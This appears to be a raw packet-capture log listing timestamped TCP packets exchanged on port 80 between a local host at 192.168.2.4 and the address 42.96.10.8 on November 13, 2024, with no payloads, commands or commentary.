                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430143118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430159092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430165052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430180073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430203915 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430212021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430237055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430254936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430268049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430284977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430299997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430305958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430305958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430306911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430340052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430344105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430361986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430377960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430392027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430408955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430423021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430438995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430459023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430466890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430466890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430466890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430475950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430493116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430509090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430526018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430552959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430569887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430586100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430613041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430615902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430615902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430615902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430629015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430655956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430670977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430696964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430697918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430723906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430737019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430743933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430757999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430761099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430778980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430794954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430813074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430824995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430824995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430825949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430844069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430860043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430874109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430881023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430891991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430907965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430908918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430924892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430928946 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.431344986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.437753916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.437771082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.437788010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.437890053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.437987089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438013077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438028097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438030958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438031912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438055992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438071012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438097954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438111067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438116074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438129902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438144922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438153982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438170910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438174009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438188076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438189030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438206911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438222885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438246965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438252926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438270092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438285112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438298941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438308954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438308954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438327074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438344002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438359976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438374996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438390970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438397884 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438406944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438416004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438425064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438465118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438481092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438496113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438505888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438505888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438513994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438533068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438559055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438581944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438596964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438611031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438673019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438673019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438688993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438704967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438721895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438780069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438793898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438793898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438796043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438823938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438838005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438853979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438863039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438879013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438889980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438898087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438914061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438931942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438983917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438983917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.438985109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439002037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439017057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439033031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439040899 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439060926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439076900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439093113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439100027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439110994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439186096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439188957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439188957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439203978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439218998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439233065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439249039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439264059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439294100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439294100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439307928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439332962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439359903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439376116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439388037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439774036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439795971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439832926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439848900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439873934 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439958096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.439970970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440000057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440015078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440062046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440064907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440082073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440095901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440113068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440129042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440131903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440131903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440182924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440200090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440216064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440254927 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440254927 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440289021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440304995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440320969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440335989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440351963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440365076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440365076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440387964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440403938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440418959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440433025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440463066 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440463066 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440495014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440505028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440521002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440537930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440551996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440568924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440582037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440634966 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440634966 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440675020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440682888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440691948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440710068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440726042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440741062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440753937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440768957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440784931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440808058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440809965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440809965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440818071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440824032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440835953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440850019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440871000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440886974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440888882 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440888882 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440903902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440927982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440927982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440962076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440978050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.440993071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.441008091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.441023111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.441036940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.441036940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.441037893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.441054106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.441118956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.441133022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.441148996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.441160917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.441167116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.441184044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.441198111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.441402912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.441416025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.441431999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.441435099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.441435099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.441448927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.443335056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.443335056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.443351984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479494095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479516029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479545116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479561090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479577065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479602098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479602098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479604006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479621887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479639053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479655027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479671001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479686022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479702950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479706049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479706049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479718924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479720116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479737043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479753017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479768038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479768991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479787111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479804993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479818106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479832888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479849100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479860067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479860067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479860067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479866028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479883909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479995012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.479995012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.511214018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.511250019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.511267900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.511282921 CET804973342.96.10.8192.168.2.4
